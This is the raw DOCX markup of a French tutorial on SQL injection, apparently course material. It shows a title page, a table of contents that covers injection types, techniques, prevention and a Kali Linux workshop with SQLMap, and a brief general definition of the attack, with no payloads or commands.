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D4365" w14:textId="6AA8D099" w:rsidR="00761777" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0DC4FE49" wp14:editId="03613EEF">
            <wp:extent cx="3810000" cy="3810000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="208897070" name="Image 1" descr="EASYFORMER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FORMER | LinkedI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06A5529C" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="454F2B8C" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="611458CD" w14:textId="79C70FE2" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00552649">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>SQL Injection : Technique et fonctionnement d’attaques</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD42221" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F403545" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B10B373" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F0618F7" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56441713" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C78122D" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D2ED9AE" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="212B5A46" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A621FFA" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:id w:val="-1125769244"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="2"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="0D5DAE83" w14:textId="77777777" w:rsidR="00552649" w:rsidRPr="007B0EE4" w:rsidRDefault="00552649" w:rsidP="00552649">
          <w:pPr>
            <w:pStyle w:val="En-ttedetabledesmatires"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-US"/>
            </w:rPr>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="5DFC7CE7" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
          <w:pPr>
            <w:pStyle w:val="En-ttedetabledesmatires"/>
          </w:pPr>
          <w:r>
            <w:t>Sommaire</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="3A50954A" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649"/>
        <w:p w14:paraId="407C1CE3" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
          <w:pPr>
            <w:pStyle w:val="Paragraphedeliste"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="1"/>
            </w:numPr>
            <w:rPr>
              <w:lang w:eastAsia="fr-FR"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:lang w:eastAsia="fr-FR"/>
            </w:rPr>
            <w:t xml:space="preserve">    </w:t>
          </w:r>
          <w:r w:rsidRPr="00FE351D">
            <w:rPr>
              <w:lang w:eastAsia="fr-FR"/>
            </w:rPr>
            <w:t>Introduction à SQL Injection</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="746D049B" w14:textId="77777777" w:rsidR="00552649" w:rsidRPr="00FE351D" w:rsidRDefault="00552649" w:rsidP="00552649">
          <w:pPr>
            <w:pStyle w:val="Paragraphedeliste"/>
            <w:ind w:left="1080"/>
            <w:rPr>
              <w:lang w:eastAsia="fr-FR"/>
            </w:rPr>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="1556ADD7" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
          <w:pPr>
            <w:pStyle w:val="Paragraphedeliste"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="1"/>
            </w:numPr>
            <w:rPr>
              <w:lang w:eastAsia="fr-FR"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:lang w:eastAsia="fr-FR"/>
            </w:rPr>
            <w:t xml:space="preserve">    </w:t>
          </w:r>
          <w:r w:rsidRPr="00FE351D">
            <w:rPr>
              <w:lang w:eastAsia="fr-FR"/>
            </w:rPr>
            <w:t>Fonctionnement de SQL Injection</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="3957CA94" w14:textId="77777777" w:rsidR="00552649" w:rsidRPr="00FE351D" w:rsidRDefault="00552649" w:rsidP="00552649">
          <w:pPr>
            <w:pStyle w:val="Paragraphedeliste"/>
            <w:ind w:left="1080"/>
            <w:rPr>
              <w:lang w:eastAsia="fr-FR"/>
            </w:rPr>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="78034F74" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
          <w:pPr>
            <w:pStyle w:val="Paragraphedeliste"/>
            <w:rPr>
              <w:lang w:eastAsia="fr-FR"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:lang w:eastAsia="fr-FR"/>
            </w:rPr>
            <w:t xml:space="preserve"> 3.      </w:t>
          </w:r>
          <w:r w:rsidRPr="00FE351D">
            <w:rPr>
              <w:lang w:eastAsia="fr-FR"/>
            </w:rPr>
            <w:t xml:space="preserve">Types de SQL Injection </w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="320BFE1E" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
          <w:pPr>
            <w:pStyle w:val="Paragraphedeliste"/>
            <w:rPr>
              <w:lang w:eastAsia="fr-FR"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:lang w:eastAsia="fr-FR"/>
            </w:rPr>
            <w:t xml:space="preserve">               </w:t>
          </w:r>
          <w:r w:rsidRPr="00FE351D">
            <w:rPr>
              <w:lang w:eastAsia="fr-FR"/>
            </w:rPr>
            <w:t xml:space="preserve">a. In-band SQL Injection </w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="11208ACF" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
          <w:pPr>
            <w:pStyle w:val="Paragraphedeliste"/>
            <w:rPr>
              <w:lang w:eastAsia="fr-FR"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:lang w:eastAsia="fr-FR"/>
            </w:rPr>
            <w:t xml:space="preserve">               </w:t>
          </w:r>
          <w:r w:rsidRPr="00FE351D">
            <w:rPr>
              <w:lang w:eastAsia="fr-FR"/>
            </w:rPr>
            <w:t xml:space="preserve">b. Inférentiel SQL Injection </w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="2879ECBC" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
          <w:pPr>
            <w:pStyle w:val="Paragraphedeliste"/>
            <w:rPr>
              <w:lang w:eastAsia="fr-FR"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:lang w:eastAsia="fr-FR"/>
            </w:rPr>
            <w:t xml:space="preserve">               </w:t>
          </w:r>
          <w:r w:rsidRPr="00FE351D">
            <w:rPr>
              <w:lang w:eastAsia="fr-FR"/>
            </w:rPr>
            <w:t>c. Out-of-band SQL Injection</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="687BB15A" w14:textId="77777777" w:rsidR="00552649" w:rsidRPr="00FE351D" w:rsidRDefault="00552649" w:rsidP="00552649">
          <w:pPr>
            <w:pStyle w:val="Paragraphedeliste"/>
            <w:ind w:left="1080"/>
            <w:rPr>
              <w:lang w:eastAsia="fr-FR"/>
            </w:rPr>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="6C4FA75A" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
          <w:pPr>
            <w:pStyle w:val="Paragraphedeliste"/>
            <w:rPr>
              <w:lang w:eastAsia="fr-FR"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:lang w:eastAsia="fr-FR"/>
            </w:rPr>
            <w:t xml:space="preserve">4.        </w:t>
          </w:r>
          <w:r w:rsidRPr="00FE351D">
            <w:rPr>
              <w:lang w:eastAsia="fr-FR"/>
            </w:rPr>
            <w:t xml:space="preserve">Techniques de SQL Injection </w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="46D429D8" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
          <w:pPr>
            <w:pStyle w:val="Paragraphedeliste"/>
            <w:rPr>
              <w:lang w:eastAsia="fr-FR"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:lang w:eastAsia="fr-FR"/>
            </w:rPr>
            <w:t xml:space="preserve">            </w:t>
          </w:r>
          <w:r w:rsidRPr="00FE351D">
            <w:rPr>
              <w:lang w:eastAsia="fr-FR"/>
            </w:rPr>
            <w:t>a.</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:lang w:eastAsia="fr-FR"/>
            </w:rPr>
            <w:t xml:space="preserve">  </w:t>
          </w:r>
          <w:r w:rsidRPr="00FE351D">
            <w:rPr>
              <w:lang w:eastAsia="fr-FR"/>
            </w:rPr>
            <w:t xml:space="preserve"> Injection basée sur l'Union </w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="545630F0" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
          <w:pPr>
            <w:pStyle w:val="Paragraphedeliste"/>
            <w:rPr>
              <w:lang w:eastAsia="fr-FR"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:lang w:eastAsia="fr-FR"/>
            </w:rPr>
            <w:t xml:space="preserve">            </w:t>
          </w:r>
          <w:r w:rsidRPr="00FE351D">
            <w:rPr>
              <w:lang w:eastAsia="fr-FR"/>
            </w:rPr>
            <w:t>b.</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:lang w:eastAsia="fr-FR"/>
            </w:rPr>
            <w:t xml:space="preserve">   </w:t>
          </w:r>
          <w:r w:rsidRPr="00FE351D">
            <w:rPr>
              <w:lang w:eastAsia="fr-FR"/>
            </w:rPr>
            <w:t xml:space="preserve">Injection basée sur l'entrée utilisateur </w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="09A04F7E" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
          <w:pPr>
            <w:pStyle w:val="Paragraphedeliste"/>
            <w:rPr>
              <w:lang w:eastAsia="fr-FR"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:lang w:eastAsia="fr-FR"/>
            </w:rPr>
            <w:t xml:space="preserve">            </w:t>
          </w:r>
          <w:r w:rsidRPr="00FE351D">
            <w:rPr>
              <w:lang w:eastAsia="fr-FR"/>
            </w:rPr>
            <w:t>c.</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:lang w:eastAsia="fr-FR"/>
            </w:rPr>
            <w:t xml:space="preserve">   </w:t>
          </w:r>
          <w:r w:rsidRPr="00FE351D">
            <w:rPr>
              <w:lang w:eastAsia="fr-FR"/>
            </w:rPr>
            <w:t>Injection basée sur les erreurs</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="66164241" w14:textId="77777777" w:rsidR="00552649" w:rsidRPr="00FE351D" w:rsidRDefault="00552649" w:rsidP="00552649">
          <w:pPr>
            <w:pStyle w:val="Paragraphedeliste"/>
            <w:rPr>
              <w:lang w:eastAsia="fr-FR"/>
            </w:rPr>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="7EF89B44" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
          <w:pPr>
            <w:pStyle w:val="Paragraphedeliste"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="2"/>
            </w:numPr>
            <w:rPr>
              <w:lang w:eastAsia="fr-FR"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:lang w:eastAsia="fr-FR"/>
            </w:rPr>
            <w:lastRenderedPageBreak/>
            <w:t xml:space="preserve">    </w:t>
          </w:r>
          <w:r w:rsidRPr="00FE351D">
            <w:rPr>
              <w:lang w:eastAsia="fr-FR"/>
            </w:rPr>
            <w:t>Prévention de SQL Injection</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="22696FDF" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
          <w:pPr>
            <w:pStyle w:val="Paragraphedeliste"/>
            <w:ind w:left="1005"/>
            <w:rPr>
              <w:lang w:eastAsia="fr-FR"/>
            </w:rPr>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="41F594B4" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
          <w:pPr>
            <w:pStyle w:val="Paragraphedeliste"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="2"/>
            </w:numPr>
            <w:rPr>
              <w:lang w:eastAsia="fr-FR"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:lang w:eastAsia="fr-FR"/>
            </w:rPr>
            <w:t xml:space="preserve">    Atelier : Mise en scène &amp; pratique sur Kali Linux.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="05569D4E" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
          <w:pPr>
            <w:pStyle w:val="Paragraphedeliste"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="5"/>
            </w:numPr>
            <w:rPr>
              <w:lang w:eastAsia="fr-FR"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:lang w:eastAsia="fr-FR"/>
            </w:rPr>
            <w:t>Dorks</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="66DD59A1" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
          <w:pPr>
            <w:pStyle w:val="Paragraphedeliste"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="5"/>
            </w:numPr>
            <w:rPr>
              <w:lang w:eastAsia="fr-FR"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:lang w:eastAsia="fr-FR"/>
            </w:rPr>
            <w:t>Installation Kali Linux</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="54C45A57" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
          <w:pPr>
            <w:pStyle w:val="Paragraphedeliste"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="5"/>
            </w:numPr>
            <w:rPr>
              <w:lang w:eastAsia="fr-FR"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:lang w:eastAsia="fr-FR"/>
            </w:rPr>
            <w:t>Introduction SQL Map</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="0BCAA82E" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
          <w:pPr>
            <w:pStyle w:val="Paragraphedeliste"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="5"/>
            </w:numPr>
            <w:rPr>
              <w:lang w:eastAsia="fr-FR"/>
            </w:rPr>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="78A2A7C0" w14:textId="77777777" w:rsidR="00552649" w:rsidRPr="00FE351D" w:rsidRDefault="00552649" w:rsidP="00552649">
          <w:pPr>
            <w:rPr>
              <w:lang w:eastAsia="fr-FR"/>
            </w:rPr>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="130A760D" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
          <w:pPr>
            <w:pStyle w:val="Paragraphedeliste"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="2"/>
            </w:numPr>
            <w:rPr>
              <w:lang w:eastAsia="fr-FR"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:lang w:eastAsia="fr-FR"/>
            </w:rPr>
            <w:t xml:space="preserve">   </w:t>
          </w:r>
          <w:r w:rsidRPr="00FE351D">
            <w:rPr>
              <w:lang w:eastAsia="fr-FR"/>
            </w:rPr>
            <w:t>Conclusion</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="135F8999" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
          <w:pPr>
            <w:pStyle w:val="Paragraphedeliste"/>
            <w:rPr>
              <w:lang w:eastAsia="fr-FR"/>
            </w:rPr>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="532E60E3" w14:textId="77777777" w:rsidR="00552649" w:rsidRPr="00FE351D" w:rsidRDefault="00552649" w:rsidP="00552649">
          <w:pPr>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="3547C80C" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DD23733" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="249C53E7" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C4B9D7C" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BE56C59" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:rPr>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F82ABCF" w14:textId="77777777" w:rsidR="00552649" w:rsidRPr="007B0EE4" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7305F532" w14:textId="77777777" w:rsidR="00552649" w:rsidRPr="000A6530" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="469C6691" w14:textId="77777777" w:rsidR="00552649" w:rsidRPr="00F05F5F" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="360"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F05F5F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>Introduction à SQL Injection :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791795A0" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18D409DF" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE351D">
        <w:rPr>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>SQL Injection est une technique d'attaque des bases de données qui consiste à insérer du code SQL malveillant dans une application web, permettant à l'attaquant d'obtenir des informations confidentielles ou de modifier les données stockées dans la base de données. Les applications web sont vulnérables aux attaques par injection SQL lorsque les données saisies par les utilisateurs ne sont pas correctement validées ou échappées.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198B7579" w14:textId="77777777" w:rsidR="00552649" w:rsidRPr="00FE351D" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1626650C" w14:textId="77777777" w:rsidR="00552649" w:rsidRPr="00F05F5F" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59FF38C7" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D7856AA" wp14:editId="209E1B20">
            <wp:extent cx="5130174" cy="2332103"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1" name="Image 1" descr="Qu'est-ce que l'injection SQL ? | Explication et protection | Av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st-ce que l'injection SQL ? | Explication et protection | Ava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58563" cy="2345008"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4E6856" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="729B8AA0" w14:textId="4066C710" w:rsidR="00552649" w:rsidRPr="00F05F5F" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4EF8492D" wp14:editId="5A5BFCB2">
            <wp:extent cx="4217670" cy="3147446"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2116760911" name="Image 2" descr="Understanding How SQL Injection Attack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rstanding How SQL Injection Attacks Wor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1310" cy="3150162"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
